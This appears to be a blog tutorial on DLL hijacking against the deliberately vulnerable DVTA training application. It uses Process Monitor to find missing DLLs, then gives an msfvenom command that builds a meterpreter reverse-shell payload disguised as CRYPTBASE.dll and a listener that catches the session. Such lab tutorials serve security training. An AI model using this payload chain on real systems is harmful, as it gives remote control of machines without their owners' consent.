DLL Hijacking

Tools needed:

  • Windows virtual machine
  • Kali linux
  • DVTA application
  • Process Monitor

By taking advantage of the way some Windows applications look for and load Dynamic Link Libraries, a technique known as “DLL hijacking” allows malicious code to be injected into an application (DLL).

This tutorial will showcase a simple DLL hijacking via the DVTA application. The application can be downloaded here.

Download the application to your windows machine before running the application start up process monitor.

Process Monitor is a sophisticated Windows monitoring program that displays process/thread activity, file system activity, and registry activity in real time.

Lets’ run the DVTA application.

Disable the following tabs in the toolbar to reduce the noise of the process monitoring:

  • Show Registry activity
  • Show Network activity

Once the application is executed , click filter in Process monitor and add the following filters:

  • Process Name is DVTA.exe
  • Result is NAME NOT FOUND
  • PATH begins with < where the DVTA/bin/release folder is located in the machine>

We can see couple of DLLs that were used but not found during the execution of the application.

Check permissions on the victim machine.

Let’s craft a payload with the CRYPTBASE.dll

Head to you attacking machine and use msfvenom to craft a payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll > CRYPTBASE.dll

Transfer the payload to the DVTA folder by a python webserver.

Let’s set up a listener with msfconsole and use the multi handler exploit.

Set the necessary options and run the exploit.

Head back to the victim machine and run the application again with the newly crafted payload inside the folder.

Check your attacking machine and a meterpreter session is gained.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



%d bloggers like this: